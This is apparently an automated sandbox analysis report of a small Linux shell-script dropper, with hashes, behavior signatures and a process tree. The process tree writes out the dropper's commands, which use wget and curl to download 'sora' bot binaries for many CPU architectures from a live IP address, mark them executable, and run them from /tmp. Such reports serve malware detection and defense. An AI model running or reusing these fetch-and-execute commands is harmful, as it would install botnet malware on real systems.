Analysis
-
max time kernel
3s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
18/10/2024, 01:47
Static task
static1
Behavioral task
behavioral1
Sample
5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
-
Size
2KB
-
MD5
891d1dcbed8ea0751d0c0d0fec39ae18
-
SHA1
57db06f345b0d9b4e2a7f4a502678a82ed792174
-
SHA256
5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a
-
SHA512
20efcebab56d13d819a5fc0f1cdaf5952ec218e8ad4a8ecad863b5ccbbbc60bf82ad7bedb67196ae51c9c0156fce1a2279013018268560331c3b436762ed2992
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1497 chmod 1506 chmod 1530 chmod 1491 chmod 1548 chmod 1566 chmod 1512 chmod 1536 chmod 1542 chmod 1572 chmod 1518 chmod 1524 chmod 1554 chmod 1560 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 1492 robben /tmp/robben 1498 robben /tmp/robben 1507 robben /tmp/robben 1513 robben /tmp/robben 1519 robben /tmp/robben 1525 robben /tmp/robben 1531 robben /tmp/robben 1537 robben /tmp/robben 1543 robben /tmp/robben 1549 robben /tmp/robben 1555 robben /tmp/robben 1561 robben /tmp/robben 1567 robben /tmp/robben 1573 robben -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1494 wget 1495 curl 1496 cat -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/robben 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
Processes
-
/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh1⤵
- Writes file to tmp directory
PID:1486 -
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x862⤵PID:1487
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x862⤵PID:1489
-
-
/bin/catcat sora.x862⤵PID:1490
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o32⤵
- File and Directory Permissions Modification
PID:1491
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:1492
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mips2⤵
- System Network Configuration Discovery
PID:1494
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mips2⤵
- System Network Configuration Discovery
PID:1495
-
-
/bin/catcat sora.mips2⤵
- System Network Configuration Discovery
PID:1496
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o32⤵
- File and Directory Permissions Modification
PID:1497
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:1498
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x86_642⤵PID:1500
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x86_642⤵PID:1504
-
-
/bin/catcat sora.x86_642⤵PID:1505
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o32⤵
- File and Directory Permissions Modification
PID:1506
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:1507
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i4682⤵PID:1509
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i4682⤵PID:1510
-
-
/bin/catcat sora.i4682⤵PID:1511
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o32⤵
- File and Directory Permissions Modification
PID:1512
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:1513
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i6862⤵PID:1515
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i6862⤵PID:1516
-
-
/bin/catcat sora.i6862⤵PID:1517
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o32⤵
- File and Directory Permissions Modification
PID:1518
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:1519
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mpsl2⤵PID:1521
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mpsl2⤵PID:1522
-
-
/bin/catcat sora.mpsl2⤵PID:1523
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o32⤵
- File and Directory Permissions Modification
PID:1524
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:1525
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm42⤵PID:1527
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm42⤵PID:1528
-
-
/bin/catcat sora.arm42⤵PID:1529
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o32⤵
- File and Directory Permissions Modification
PID:1530
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:1531
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm52⤵PID:1533
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm52⤵PID:1534
-
-
/bin/catcat sora.arm52⤵PID:1535
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o32⤵
- File and Directory Permissions Modification
PID:1536
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:1537
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm62⤵PID:1539
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm62⤵PID:1540
-
-
/bin/catcat sora.arm62⤵PID:1541
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o32⤵
- File and Directory Permissions Modification
PID:1542
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:1543
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm72⤵PID:1545
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm72⤵PID:1546
-
-
/bin/catcat sora.arm72⤵PID:1547
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o32⤵
- File and Directory Permissions Modification
PID:1548
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:1549
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc2⤵PID:1551
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc2⤵PID:1552
-
-
/bin/catcat sora.ppc2⤵PID:1553
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o32⤵
- File and Directory Permissions Modification
PID:1554
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:1555
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc440fp2⤵PID:1557
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc440fp2⤵PID:1558
-
-
/bin/catcat sora.ppc440fp2⤵PID:1559
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o32⤵
- File and Directory Permissions Modification
PID:1560
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:1561
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.m68k2⤵PID:1563
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.m68k2⤵PID:1564
-
-
/bin/catcat sora.m68k2⤵PID:1565
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o32⤵
- File and Directory Permissions Modification
PID:1566
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:1567
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.sh42⤵PID:1569
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.sh42⤵PID:1570
-
-
/bin/catcat sora.sh42⤵PID:1571
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o32⤵
- File and Directory Permissions Modification
PID:1572
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:1573
-